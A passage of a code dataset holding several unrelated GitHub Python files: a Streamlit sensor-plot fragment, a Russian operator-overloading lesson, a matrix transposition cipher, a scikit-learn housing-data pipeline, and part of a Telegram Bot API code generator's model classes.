Dann kann hier der Graph mit der ID anstatt der Zeit als X-Achse ausgegeben werden.\n \"\"\")\n if st.button('Hier anzeigen'):\n import matplotlib.pyplot as plt\n plt.plot(df.index, df.Temperatur, label='Temperatur [°C]')\n plt.plot(df.index, df.Feuchte, label='Feuchte [%]')\n #plt.plot(new_df.index, new_df.Druck, label='Druck')\n plt.legend(loc='upper left')\n plt.title(f\"Termeraturverlauf von {name}\")\n plt.xlabel(\"ID\")\n st.pyplot(plt)\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"jonathanhoss/IOT_Streamlit_app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37751956733","text":"# Оператор Метод оператора\n#\n# x + y __add__(self, other)\n# x - y __sub__(self, other)\n# x * y __mul__(self, other)\n# x / y __truediv__(self, other)\n# x // y __floordiv__(self, other)\n# x % y __mod__(self, other)\n#\n# x += y __iadd__(self, other)\n# x -= y __isub__(self, other)\n# x *= y __imul__(self, other)\n# x /= y __itruediv__(self, other)\n# x //= y __ifloordiv__(self, other)\n# x %= y __imod__(self, other)\n\nclass Clock:\n __DAY = 86400 # число секунд в одном дне\n\n def __init__(self, seconds: int):\n if not isinstance(seconds, int):\n raise TypeError(\"Секунды должны быть целым числом\")\n self.seconds = seconds % self.__DAY\n\n def get_time(self):\n s = self.seconds % 60 # секунды\n m = (self.seconds // 60) % 60 # минуты\n h = (self.seconds // 3600) % 24 # часы\n return f\"{self.__get_formatted(h)}:{self.__get_formatted(m)}:{self.__get_formatted(s)}\"\n\n @classmethod\n def __get_formatted(cls, x):\n return str(x).rjust(2, \"0\")\n\n '''def __add__(self, other):\n if not isinstance(other, int):\n raise ArithmeticError(\"Правый операнд должен быть типом int\")\n\n return Clock(self.seconds + other)'''\n\n def __add__(self, other): # сложение object + int\n if not isinstance(other, (int, Clock)):\n raise ArithmeticError(\"Правый операнд должен быть типом int или объектом Clock\")\n\n sc = other if isinstance(other, int) else other.seconds\n return self.__class__(self.seconds + sc)\n\n def __radd__(self, other): # сложение int + object\n return self + other\n\n def __iadd__(self, other): # oject += int\n print(\"__iadd__\")\n if not isinstance(other, (int, Clock)):\n raise ArithmeticError(\"Правый операнд должен быть типом int или объектом Clock\")\n\n sc = other if isinstance(other, int) else other.seconds\n self.seconds += sc\n\n return self\n\n\n# c1 = Clock(1000)\n# print(c1.get_time())\n# c1.seconds = c1.seconds + 100 # изменение времени в объекте с1\n# c1 = c1 + 100 # Чтобы данная запись работала нужно добавить метод add\n# с1 = c1.__add__(100) # запись равно с1 = с1 + 100\n'''c1 = Clock(1000)\nc2 = Clock(2000)\nc3 = c1 + c2\nprint(c3.get_time())'''\nc1 = Clock(1000)\nc2 = Clock(2000)\nc3 = Clock(3000)\nc4 = c1 + c2 + c3\nprint(c4.get_time())\nс5 = 100 + c1\nс5 += 100\n","repo_name":"Motayassa/OOP_in_Python","sub_path":"oop/methods_add_sub_mul_div/theory1.py","file_name":"theory1.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"38296334868","text":"from numpy import array\n\n\ndef encode(message, keys):\n message = ''.join(message.split())\n liter = message[-1]\n n, m = len(keys[0]), len(keys[1])\n while len(message) % n != 0:\n message += liter\n matrix = [[j for j in message[i * n:(i + 1) * n]] for i in range(len(message) 
// n)]\n while len(matrix) % m != 0:\n tmp = liter * n\n matrix.append([j for j in tmp])\n # add key_n and sort\n matrix = array([array(item) for item in matrix])\n matrix = array([array([j for j in keys[0]]), *matrix]).transpose()\n matrix = array(sorted(matrix, key=lambda item: item[0])).transpose()[1:]\n # add key_m and sort\n key_m = keys[1] * (len(matrix) // m)\n matrix = array(matrix).transpose()\n matrix = array([array([j for j in key_m]), *matrix]).transpose()\n matrix = array([array(matrix[i * m:(i + 1) * m]) for i in range(len(matrix) // m)])\n matrix = array([array(sorted(item, key=lambda row: row[0])) for item in matrix])\n matrix = array([array(item.transpose()[1:]) for item in matrix])\n encoded = ''.join([''.join([''.join(row) for row in item]) for item in matrix])\n return encoded\n\n\ndef decode(message, keys):\n n, m = len(keys[0]), len(keys[1])\n encoded_keys = array([sorted(key) for key in keys])\n encoded = []\n # key_m\n for i in range(len(message) // m):\n if i == 0:\n tmp = [[j for j in message[i * m:(i + 1) * m]]]\n else:\n if i % n == 0:\n if tmp:\n tmp = [[j for j in encoded_keys[1]], *tmp]\n encoded.append(array([array(item) for item in tmp]).transpose())\n tmp = [[j for j in message[i * m:(i + 1) * m]]]\n else:\n tmp.append([j for j in message[i * m:(i + 1) * m]])\n if i + 1 == len(message) // m:\n tmp = [[j for j in encoded_keys[1]], *tmp]\n encoded.append(array([array(item) for item in tmp]).transpose())\n encoded = array(encoded)\n\n for k, item in enumerate(encoded):\n for i in range(len(keys[1])):\n for j, val in enumerate(item):\n if j != i:\n if keys[1][i] == item[j][0]:\n encoded[k][i], encoded[k][j] = array(list(encoded[k][j])), array(list(encoded[k][i]))\n break\n\n encoded = array([array(item.transpose()[1:]).transpose() for item in encoded])\n # key_n\n encoded = array([array([array([j for j in encoded_keys[0]]), *item]).transpose() for item in encoded])\n for k, item in enumerate(encoded):\n for i in range(len(keys[0])):\n for j, val in enumerate(item):\n if j != i:\n if keys[0][i] == item[j][0]:\n encoded[k][i], encoded[k][j] = array(list(encoded[k][j])), array(list(encoded[k][i]))\n break\n\n encoded = array([array(item.transpose()[1:]) for item in encoded])\n decoded = ''.join([''.join([''.join(row) for row in item]) for item in encoded])\n return decoded\n","repo_name":"sergey-jr/InfoSecurity","sub_path":"cipher/done/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72629018463","text":"import os\nimport tarfile\nfrom six.moves import urllib\n\nDOWNLOAD_ROOT = \"https://raw.githubusercontent.com/ageron/handson-ml/master/\"\nHOUSING_PATH = \"datasets/housing\"\nHOUSING_URL = DOWNLOAD_ROOT + HOUSING_PATH + \"/housing.tgz\"\n\ndef fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):\n if not os.path.isdir(housing_path):\n os.makedirs(housing_path)\n tgz_path = os.path.join(housing_path, \"housing.tgz\")\n urllib.request.urlretrieve(housing_url, tgz_path)\n housing_tgz = tarfile.open(tgz_path)\n housing_tgz.extractall(path=housing_path)\n housing_tgz.close()\n\nimport pandas as pd\n\ndef load_housing_data(housing_path=HOUSING_PATH):\n csv_path = os.path.join(housing_path, \"housing.csv\")\n return pd.read_csv(csv_path)\n\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\nclass DataFrameSelector(BaseEstimator, TransformerMixin):\n def __init__(self, attribute_names):\n 
self.attribute_names = attribute_names\n    def fit(self, X, y=None):\n        return self\n    def transform(self, X):\n        return X[self.attribute_names].values\n\nimport numpy as np\n\nrooms_ix, bedrooms_ix, population_ix, household_ix = 3, 4, 5, 6\nclass CombinedAttributesAdder(BaseEstimator, TransformerMixin):\n    def __init__(self, add_bedrooms_per_room=True):\n        self.add_bedrooms_per_room = add_bedrooms_per_room\n    def fit(self, X, y=None):\n        return self\n    def transform(self, X, y=None):\n        rooms_per_household = X[:, rooms_ix] / X[:, household_ix]\n        population_per_household = X[:, population_ix] / X[:, household_ix]\n        if self.add_bedrooms_per_room:\n            bedrooms_per_room = X[:, bedrooms_ix] / X[:, rooms_ix]\n            return np.c_[X, rooms_per_household, population_per_household, bedrooms_per_room]\n        else:\n            return np.c_[X, rooms_per_household, population_per_household]\n\n\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.preprocessing import StandardScaler, Imputer, LabelBinarizer\n\nfetch_housing_data()\nhousing = load_housing_data()\n\nhousing['rooms_per_household'] = housing['total_rooms'] / housing['households']\nhousing['bedrooms_per_room'] = housing['total_bedrooms'] / housing['total_rooms']\nhousing['population_per_household'] = housing['population'] / housing['households']\n\nhousing_labels = housing['median_house_value'].copy()\nhousing = housing.drop('median_house_value', axis=1)\n\nhousing_num = housing.drop('ocean_proximity', axis=1)\nnum_attribs = list(housing_num)\ncat_attribs = ['ocean_proximity']\n\nnum_pipeline = Pipeline([\n    ('selector', DataFrameSelector(num_attribs)),\n    ('imputer', Imputer(strategy='median')),\n    ('attribs_adder', CombinedAttributesAdder()),\n    ('std_scaler', StandardScaler()),\n])\n\ncat_pipeline = Pipeline([\n    ('selector', DataFrameSelector(cat_attribs)),\n    ('label_binarizer', LabelBinarizer()),\n])\n\nfull_pipeline = FeatureUnion(transformer_list=[\n    ('num_pipeline', num_pipeline),\n    ('cat_pipeline', cat_pipeline),\n])\n\nif __name__ == '__main__':\n    housing_prepared = full_pipeline.fit_transform(housing)\n    ","repo_name":"del874/machine-learning_study","sub_path":"housing.py","file_name":"housing.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"3473671456","text":"import re\nfrom itertools import chain\nfrom typing import Mapping, Union, List, Tuple, Optional, Callable\n\nfrom luckydonaldUtils.exceptions import assert_type_or_raise\nfrom luckydonaldUtils.functions import cached\nfrom luckydonaldUtils.imports.relative import relimport\n\nBUILTIN_NAMES = ('type', 'id') # everything which makes the variable become gray in PyCharm\nSENTENCE_SPLIT_REGEX = re.compile('[\\\.!?](?:\\\s+|(?=NOTE:))', re.MULTILINE)\n\nclass KwargableObject(Mapping):\n    \"\"\" allow `**self`, and include all @property s \"\"\"\n    def __getitem__(self, key):\n        try:\n            return self.__getattribute__(key)\n        except AttributeError as e:\n            raise KeyError(key)\n        # end try\n    # end def __getitem__\n\n    def __len__(self):\n        return len(list(self.__iter__()))\n    # end def __len__\n\n    def __iter__(self):\n        import inspect\n        def is_allowed(value):\n            return isinstance(value, property)\n        # end def is_allowed\n        return iter(\n            [name for (name) in vars(self) if not name.startswith(\"_\")] +\n            [name for (name, value) in inspect.getmembers(self.__class__, is_allowed)]\n        )\n    # end def __iter__\n\n    def __repr__(self):\n        return (\n            \"{s.__class__.__name__}(\" +\n            (\", \".join([\"{key}={value!r}\".format(key=k, value=self[k]) for k in self])) +\n            \")\"\n        ).format(s=self)\n    # end def __repr__\n# end class KwargableObject\n\n\nclass ClassOrFunction(KwargableObject):\n    def __init__(self, filepath=None):\n        \"\"\"\n        :param filepath: where this function or class should be stored.\n        \"\"\"\n        self.filepath = filepath\n# end class ClassOrFunction\n\n\n# noinspection PyCompatibility\nclass Clazz(ClassOrFunction):\n    def __init__(\n        self,\n        clazz: Union[None, str] = None,\n        import_path: Union[None, 'Import'] = None,\n        imports: Union[None, List['Import']] = None,\n        parent_clazz: Union[None, 'Type'] = None,\n        link: Union[None, str] = None,\n        description: Union[None, str] = None,\n        parameters: Union[None, List['Variable']] = None,\n        keywords: Union[None, List['Variable']] = None,\n    ):\n        super(Clazz, self).__init__()\n        self.clazz = clazz\n        self.import_path = import_path if import_path is not None else self.calculate_import_path()\n        self.imports = imports if imports else []  # Imports needed by parameters and keywords.\n        self.parent_clazz = parent_clazz if parent_clazz is not None else Type(\"object\", is_builtin=True)\n        assert_type_or_raise(self.parent_clazz, Type, parameter_name=\"self.parent_clazz\")\n        self.link = link\n        self.description = description\n        self.parameters = parameters if parameters else []\n        self.keywords = keywords if keywords else []\n    # end def __init__\n\n    def calculate_import_path(self) -> 'Import':\n        from code_generator import get_type_path\n        import_path = get_type_path(self.clazz, as_object=True)\n        return import_path\n    # end def\n\n    def calculate_filepath(self, folder: str) -> str:\n        return self.import_path.calculate_filepath(folder)\n    # end def\n\n    @property\n    def variables(self):\n        return self.parameters + self.keywords\n    # end def variables\n\n    def has_same_variable(\n        self,\n        variable: 'Variable',\n        ignore_pytg_name: bool = False,\n        ignore_description: bool = False,\n        ignore_optional: bool = False,\n        ignore_type_always_is_value: bool = False,\n        allow_additional_allowed_type_matchings: bool = False,\n    ) -> bool:\n        if self.get_same_variable(\n            variable=variable, ignore_pytg_name=ignore_pytg_name, ignore_description=ignore_description,\n            ignore_optional=ignore_optional, ignore_type_always_is_value=ignore_type_always_is_value,\n            allow_additional_allowed_type_matchings=allow_additional_allowed_type_matchings,\n        ) is None:\n            return False\n        # end if\n        return True\n    # end def\n\n    def get_same_variable(\n        self,\n        variable: 'Variable',\n        ignore_pytg_name: bool = False,\n        ignore_description: bool = False,\n        ignore_optional: bool = False,\n        ignore_type_always_is_value: bool = False,\n        allow_additional_allowed_type_matchings: bool = False,\n    ) -> Optional['Variable']:\n        assert_type_or_raise(variable, Variable, parameter_name='variable')\n        for own_variable in self.variables:\n            if own_variable.compare(\n                variable,\n                ignore_pytg_name=ignore_pytg_name,\n                ignore_description=ignore_description,\n                ignore_optional=ignore_optional,\n                ignore_type_always_is_value=ignore_type_always_is_value,\n                allow_additional_allowed_type_matchings=allow_additional_allowed_type_matchings,\n            ):\n                return own_variable\n            # end if\n        # end for\n        return None\n    # end def\n\n    def __repr__(self):\n        return (\n            \"Clazz(\"\n            \"clazz={s.clazz!r}, import_path={s.import_path!r}, imports={s.imports!r}, parent_clazz={s.parent_clazz!r}\"\n            \", link={s.link!r}, description={s.description!r}, parameters={s.parameters!r}, keywords={s.keywords!r}\"\n            \")\"\n        ).format(s=self)\n    # end def __repr__\n\n    def 
to_array(self):\n        return {\n            \"clazz\": self.clazz,\n            \"import_path\": self.import_path,\n            \"imports\": self.imports,\n            \"parent_clazz\": self.parent_clazz,\n            \"link\": self.link,\n            \"description\": self.description,\n            \"parameters\": self.parameters,\n            \"keywords\": self.keywords,\n        }\n    # end def\n\n    def has_builtin_variables(self, duplicate_of_parent=None):\n        \"\"\"\n        :param duplicate_of_parent: Filter for variable.duplicate_of_parent. None to not filter, True/False to allow only those.\n        :return:\n        \"\"\"\n        return any([\n            variable.name in BUILTIN_NAMES\n            for variable in self.variables\n            if duplicate_of_parent is None or variable.duplicate_of_parent == duplicate_of_parent\n        ])\n    # end def\n\n    def clone(self):\n        return self.__class__(**self.to_array())\n    # end def\n# end class Clazz\n\n\nclass Function(ClassOrFunction):\n    def __init__(self, api_name=None, imports: List['Import']=None, link=None, description=None, returns=None, parameters: List['Variable']=None, keywords=None):\n        super(Function, self).__init__()\n        self.api_name = api_name # api_name\n        self.imports = imports if imports else []\n        self.link = link\n        self.description = description\n        self.returns = returns\n        self.parameters = parameters if parameters else []\n        self.keywords = keywords if keywords else []\n    # end def __init__\n\n    @property\n    def variables(self):\n        return self.parameters + self.keywords\n    # end def variables\n\n    @property\n    def variable_names(self):\n        return [var.name for var in self.variables]\n    # end def variable_names\n\n    @property\n    def name(self):\n        from code_generator import convert_to_underscore\n        return convert_to_underscore(self.api_name)\n    # end def name\n\n    def __repr__(self):\n        return (\n            \"Function(\"\n            \"api_name={s.api_name!r}, imports={s.imports!r}, link={s.link!r}, description={s.description!r}, \"\n            \"returns={s.returns!r}, parameters={s.parameters!r}, keywords={s.keywords!r}\"\n            \")\".format(s=self)\n        )\n    # end def __repr__\n\n    @property\n    def class_name(self) -> str:\n        \"\"\"\n        Makes the first letter big, keep the rest of the camelCaseApiName.\n        \"\"\"\n        if not self.api_name: # empty string\n            return self.api_name\n        # end if\n        return self.api_name[0].upper() + self.api_name[1:]\n    # end def\n\n    @property\n    def class_name_teleflask_message(self) -> str:\n        \"\"\"\n        If it starts with `Send` remove that.\n        \"\"\"\n        # strip leading \"Send\"\n        name = self.class_name # \"sendPhoto\" -> \"SendPhoto\"\n        name = name[4:] if name.startswith('Send') else name # \"SendPhoto\" -> \"Photo\"\n        name = name + \"Message\" # \"Photo\" -> \"PhotoMessage\"\n\n        # e.g. 
\"MessageMessage\" will be replaced as \"TextMessage\"\n # b/c \"sendMessage\" -> \"SendMessage\" -> \"Message\" -> \"MessageMessage\" ==> \"TextMessage\"\n from code_generator_settings import MESSAGE_CLASS_OVERRIDES\n if name in MESSAGE_CLASS_OVERRIDES:\n return MESSAGE_CLASS_OVERRIDES[name]\n # end if\n return name\n # end def\n\n @property\n @cached\n def class_variables_separated(self) -> Tuple[List['Variable'], List['Variable'], List['Variable']]:\n args = []\n special_kwargs = [] # receiver and reply_id\n kwargs = []\n args_and_kwargs = chain((('arg', arg) for arg in self.parameters), (('kwarg', kwarg) for kwarg in self.keywords))\n for variable, param in args_and_kwargs:\n if param.name == \"chat_id\":\n # :param receiver: Unique identifier for the target chat or username of the target channel (in the format @channelusername)\n # :type receiver: int|str\n default = Type(\n 'None',\n is_builtin=True,\n always_is_value=None,\n is_list=False,\n import_path=None,\n description=\"Use the chat from the update context.\"\n )\n\n special_kwargs.append(Variable(\n api_name=param.api_name,\n pytg_name=param.name,\n name='receiver',\n types=[\n Type(\n 'str',\n is_builtin=True,\n always_is_value=None,\n is_list=False,\n import_path=None,\n description=\"The @username of user/group/channel.\"\n ),\n Type(\n 'int',\n is_builtin=True,\n always_is_value=None,\n is_list=False,\n import_path=None,\n description=\"The chat's id.\"\n )\n ],\n optional=True,\n default=default,\n description=\"Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.\"\n ))\n elif param.name == \"reply_to_message_id\":\n # :param reply_id: If the messages are a reply, ID of the original message\n # :type reply_id: int\n default = Type(\n 'DEFAULT_MESSAGE_ID',\n is_builtin=True,\n always_is_value='DEFAULT_MESSAGE_ID',\n is_list=False,\n import_path=None,\n description=\"So you can overwrite it with `None` if you don't want a reply.\"\n )\n special_kwargs.append(Variable(\n api_name=param.api_name,\n name='reply_id',\n pytg_name=param.name,\n types=[\n default,\n Type(\n 'int',\n is_builtin=True,\n always_is_value=None,\n is_list=False,\n import_path=None,\n description=\"A different `message_id` to reply to.\"\n )\n ],\n optional=True,\n default=default,\n description=\"Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.\"\n ))\n elif variable == 'arg':\n args.append(param)\n else:\n assert variable == 'kwarg'\n kwargs.append(param)\n # end if\n # end for\n return args, special_kwargs, kwargs\n # end def\n\n @property\n def variables(self):\n return self.parameters + self.keywords\n # end def variables\n# end class Function\n\n\n# noinspection PyCompatibility\nclass Variable(dict):\n def __init__(\n self,\n api_name: str = None,\n name: str = None,\n pytg_name: str = None,\n types: List['Type'] = None,\n optional: bool = None,\n default: Union[None, str, 'Type'] = None,\n description: Optional[str] = None,\n duplicate_of_parent: Optional[bool] = None,\n additional_allowed_type_matchings: Optional[List[List['Type']]] = None,\n ):\n \"\"\"\n :param api_name: Name the telegram api uses.\n :param name: Internal name we use.\n :param pytg_name: Internal name we use with pytg's send_* functions in the teleflask message classes.\n :param types: `list` of :class:`Type`. [Type(int), Type(bool)] or [Type(Message)] etc.\n :param optional: If it is not needed. 
`True` will be a normal parameter, `False` means a kwarg.\n :param default: If it is optional, that is the default value. Else it uses \"None\" via templating.\n :param duplicate_of_parent: If True, this (class) variable is also present in the parent class we inherit from.\n :param description:\n \"\"\"\n self.api_name = api_name # parse_param_types(param)\n self.name = name if name else api_name # parse_param_types(param)\n self.types = types if types else [] # parse_param_types(param)\n self.pytg_name = pytg_name if pytg_name else name # teleflask messages\n self.optional = optional # bool # parse_param_types(param)\n self.default = default # bool\n self.description = description # some text about it. # parse_param_types(param)\n self.duplicate_of_parent = duplicate_of_parent\n self.additional_allowed_type_matchings = additional_allowed_type_matchings if additional_allowed_type_matchings else []\n # end def\n\n \"\"\"\n Get all needed Imports.\n\n :return: Return set of all needed :class:`Import` s.\n :rtype: set\n \"\"\"\n @property\n def all_imports(self):\n imports = set()\n for type in self.types:\n if type.import_path:\n imports.add(Import(type.import_path.rstrip('.'), type.string))\n # end if\n # end for\n return imports\n # end def all_imports\n\n @property\n def typehint(self) -> str:\n \"\"\"\n Returns a python 3.5+ type hint string.\n\n Depending on the amount of types in the self.types list.\n - For 0 elements, the returned type is `Any`.\n - For 1 element it's just that type.\n - For more elements it's a `Union[...]`.\n\n :uses: Variable.types\n :uses: Type.typehint\n \"\"\"\n if len(self.types) == 0:\n return \"Any\"\n # end if\n if len(self.types) == 1:\n return self.types[0].typehint\n # end if\n return (\", \".join(t.typehint for t in self.types)).join((\"Union[\", \"]\"))\n # end def\n\n @property\n def typehint_optional(self):\n if self.optional:\n return self.typehint.join((\"Optional[\", \"]\"))\n # end if\n return self.typehint\n # end def\n\n @property\n def typehint_quoted(self) -> str:\n \"\"\"\n Returns a python 3.5+ type hint string.\n\n Depending on the amount of types in the self.types list.\n - For 0 elements, the returned type is `Any`.\n - For 1 element it's just that type, quoted.\n - For more elements it's a `Union[...]`.\n\n :uses: Variable.types\n :uses: Type.typehint\n \"\"\"\n if len(self.types) == 0:\n return \"Any\"\n # end if\n if len(self.types) == 1:\n return repr(self.types[0].typehint)\n # end if\n return (\", \".join(repr(t.typehint) for t in self.types)).join((\"Union[\", \"]\"))\n # end def\n\n @property\n def typehint_quoted_optional(self):\n if self.optional:\n return self.typehint_quoted.join((\"Optional[\", \"]\"))\n # end if\n return self.typehint_quoted\n\n # end def\n\n @property\n def typehint_has_model(self):\n for t in self.types:\n if not t.is_builtin:\n return True\n # end if\n # end for\n return False\n # end def\n\n @property\n def typehint_optional_model(self):\n \"\"\"\n Creates a typehint without Json type.\n For type annotations of the parsed variable, and for final validation.\n See https://github.com/tiangolo/fastapi/issues/884.\n \"\"\"\n return self.create_typehint_optional_model(json_mode=False)\n # end def\n\n @property\n def typehint_optional_model_json(self):\n \"\"\"\n Creates a typehint with Json type for fastapi query params.\n See https://github.com/tiangolo/fastapi/issues/884.\n \"\"\"\n return self.create_typehint_optional_model(json_mode=True)\n # end def\n\n def create_typehint_optional_model(self, 
json_mode: bool = False, quote_models: bool = True):\n \"\"\"\n :param json_mode: If we should wrap the thing in `Json[...]`\n :param quote_models: If we should wrap models in quotes for resolving them later.\n\n Examples:\n - `param.create_typehint_optional_model(json_mode=True, quote_models=True)`:\n Creates a typehint with Json[...'FooModel'...] type for fastapi query params.\n\n - `param.create_typehint_optional_model(json_mode=True, quote_models=True)`:\n Creates a typehint with a quoted 'FooModel' for lazy loading models, i.e. when using in arguments of depending models.\n\n - `param.create_typehint_optional_model(json_mode=False, quote_models=False)`\n Creates a typehint without `Json` type, for type annotations of the parsed variable, and e.g. for final validation with `parse_obj_as`.\n \"\"\"\n if len(self.types) == 0:\n type_str = \"Any\"\n else:\n if quote_models:\n wrap_models: Callable[[str], str] = lambda type_str: f'{f\"{type_str}Model\"!r}'\n else:\n wrap_models: Callable[[str], str] = lambda type_str: f'{type_str}Model'\n # end if\n if len(self.types) == 1:\n type_str = self.create_model(self.types[0], wrap_models=wrap_models)\n else:\n type_str = (\n \", \".join(self.create_model(t, wrap_models=wrap_models) for t in self.types)\n ).join((\"Union[\", \"]\"))\n # end if\n # end if\n\n if json_mode and self.typehint_has_model:\n type_str = type_str.join((\"Json[\", \"]\"))\n # end def\n\n if self.optional:\n type_str = type_str.join((\"Optional[\", \"]\"))\n # end if\n return type_str\n # end def\n\n\n @staticmethod\n def create_model(the_type: 'Type', wrap_models: Union[None, Callable[[str], str]] = None):\n type_str = the_type.string\n if wrap_models and not the_type.is_builtin:\n # noinspection PyCompatibility\n type_str = wrap_models(type_str)\n # end def\n for i in range(the_type.is_list):\n type_str = type_str.join((\"List[\", \"]\"))\n # end def\n return type_str\n # end def\n\n @property\n def is_fixed_value(self) -> bool:\n if self.optional:\n # if it is \"True or None\" it is not \"always True\"\n return False\n # end if\n if len(self.types) != 1:\n # more than one possible value\n return False\n # end if\n # noinspection PyShadowingBuiltins\n type: Type = self.types[0]\n if type.always_is_value is None:\n # we have no such 'always' value set.\n return False\n # end if\n\n # we did all the checks, so it must be always be the same value.\n return True\n # end if\n\n @property\n def description_sentence_split_list(self) -> Optional[List[str]]:\n if self.description is None:\n return None\n # end if\n text: str = self.description\n\n splits = SENTENCE_SPLIT_REGEX.split(text)\n if not \". \".join(splits) in (text, text.replace('.NOTE:', '. NOTE:')):\n return [text]\n # end if\n return [f'{split}{\"\" if split.endswith(\".\") else \".\"}' for split in splits]\n # end def\n\n def description_sentence_split_str(self, *, indent=0) -> Optional[str]:\n splits = self.description_sentence_split_list\n if splits[0] == 'Optional.':\n splits[1] = f'Optional. 
{splits[1]}'\n del splits[0]\n # end if\n if splits is None:\n return None\n # end if\n return f\"\\n{' ' * indent}\".join(splits)\n # end def\n\n @property\n def value_to_set(self):\n \"\"\"\n Used in super class call super().__init__(...)\n :return:\n \"\"\"\n if not self.is_fixed_value:\n return self.name\n # end if\n\n # noinspection PyShadowingBuiltins\n type: Type = self.types[0]\n if type.always_is_value in ('True', 'False', 'None'):\n return type.always_is_value\n # end if\n return repr(type.always_is_value) # so we get 'photo'\n # end def\n\n def __repr__(self):\n return (\n \"Variable(\"\n \"api_name={s.api_name!r}, name={s.name!r}, pytg_name={s.pytg_name!r}, types={s.types!r}, \"\n \"optional={s.optional!r}, default={s.default!r}, description={s.description!r}, \"\n \"duplicate_of_parent={s.duplicate_of_parent!r}\"\n # \"duplicate_of_parent={s.duplicate_of_parent!r}, additional_allowed_type_matchings={s.additional_allowed_type_matchings!r}\"\n \")\"\n ).format(s=self)\n # end def __repr__\n\n def __eq__(self, other: object) -> bool:\n \"\"\" self == other \"\"\"\n if not isinstance(other, self.__class__):\n return super().__eq__(other)\n # end if\n return self.compare(other, ignore_description=False)\n # end def __eq__\n\n def compare(\n self,\n other: 'Variable',\n ignore_pytg_name: bool = False,\n ignore_description: bool = False,\n ignore_optional: bool = False,\n ignore_type_always_is_value: bool = False,\n allow_additional_allowed_type_matchings: bool = False,\n ):\n assert_type_or_raise(other, Variable, parameter_name='other')\n return (\n self.api_name == other.api_name and\n self.name == other.name and\n (\n any(\n len(own_types) == len(other.types)\n and\n all(\n Type.compare(\n self=own_type,\n other=other.types[i],\n ignore_always_is_value=ignore_type_always_is_value,\n ignore_description=ignore_description\n )\n for i, own_type\n in enumerate(own_types)\n )\n for own_types in\n [self.types] +\n (self.additional_allowed_type_matchings if allow_additional_allowed_type_matchings and self.additional_allowed_type_matchings else [])\n )\n ) and\n (ignore_pytg_name or self.pytg_name == other.pytg_name) and\n (ignore_optional or self.optional == other.optional) and\n self.default == other.default and\n (ignore_description or self.description == other.description) and\n True\n )\n # end def compare\n\n def to_array(self):\n return {\n \"api_name\": self.api_name,\n \"name\": self.name,\n \"types\": self.types,\n \"pytg_name\": self.pytg_name,\n \"optional\": self.optional,\n \"default\": self.default,\n \"description\": self.description,\n \"duplicate_of_parent\": self.duplicate_of_parent,\n \"additional_allowed_type_matchings\": [types[:] for types in self.additional_allowed_type_matchings], # deep\n }\n # end def\n\n def clone(self):\n return self.__class__(**self.to_array())\n # end def\n# end class Variable\n\n\nclass Type(dict):\n def __init__(self, string=None, is_builtin=None, always_is_value=None, is_list=0, import_path=None, description=None):\n \"\"\"\n Stores variable types.\n\n :param string: the type (e.g. \"bool\")\n :type string: str\n\n :param is_builtin: If it is a build in type (:class:`float`, :class:`int`, ...)\n or not (classes like :class:`Message`, :class:`Peer`...)\n :type is_builtin: bool\n\n :param always_is_value: None or the only possible value (e.g. a bool, always \"True\")\n :type always_is_value: None or str\n\n :param is_list: Levels of lists.\n `0` = not a list.\n `1` = it is an list of :param:`string`s type (e.g. 
list of bool could be [True, False] ).\n If is \"list of list of\" that value is `2`\n :type is_list: int\n\n :param import_path: from import . None for builtins.\n :type import_path: str or None\n\n :param description: if there are additional comments needed.\n :type description: str or None\n \"\"\"\n super(Type, self).__init__()\n self.string = string # the type (e.g. \"bool\")\n self.is_builtin = is_builtin # bool. If it is a build in type (float, int, ...) or not.\n self.always_is_value = always_is_value # None or the only possible value (e.g. a bool, always \"True\")\n self.is_list = is_list # number denoting the list level. 0 means 'no list'. 1 is foo[], and 2 would be foo[][].\n self.import_path = import_path # from import \n self.description = description # if there are additional comments needed.\n # end def __init__\n\n @property\n def as_import(self) -> 'Import':\n return Import(self.import_path, self.string)\n # end def as_import\n\n @property\n def typehint(self) -> str:\n \"\"\"\n Returns a python 3.5+ type hint string.\n \"\"\"\n type_str = self.string\n for i in range(self.is_list):\n type_str = type_str.join((\"List[\", \"]\"))\n # end for\n return type_str\n # end def\n\n def __str__(self):\n return \"{list}<{name}>\".format(list=\"list of \" * self.is_list, name=self.string)\n # end def __str__\n\n def __repr__(self):\n return (\n \"Type(\"\n \"string={s.string!r}, is_builtin={s.is_builtin!r}, always_is_value={s.always_is_value!r}, \"\n \"is_list={s.is_list!r}, import_path={s.import_path!r}, description={s.description!r}\"\n \")\"\n ).format(s=self)\n # end def __repr__\n\n def __eq__(self, other: object) -> bool:\n \"\"\" self == other \"\"\"\n if not isinstance(other, self.__class__):\n return super().__eq__(other)\n # end if\n return self.compare(other, ignore_description=False)\n # end def __eq__\n\n def compare(self, other: 'Type', ignore_always_is_value: bool = False, ignore_description: bool = False):\n assert_type_or_raise(other, Type, parameter_name='other')\n return (\n self.string == other.string and # the type (e.g. \"bool\")\n self.is_builtin == other.is_builtin and # bool. If it is a build in type (float, int, ...) or not.\n (ignore_always_is_value or self.always_is_value == other.always_is_value) and # None or the only possible value (e.g. a bool, always \"True\")\n self.is_list == other.is_list and # number denoting the list level. 0 means 'no list'. 
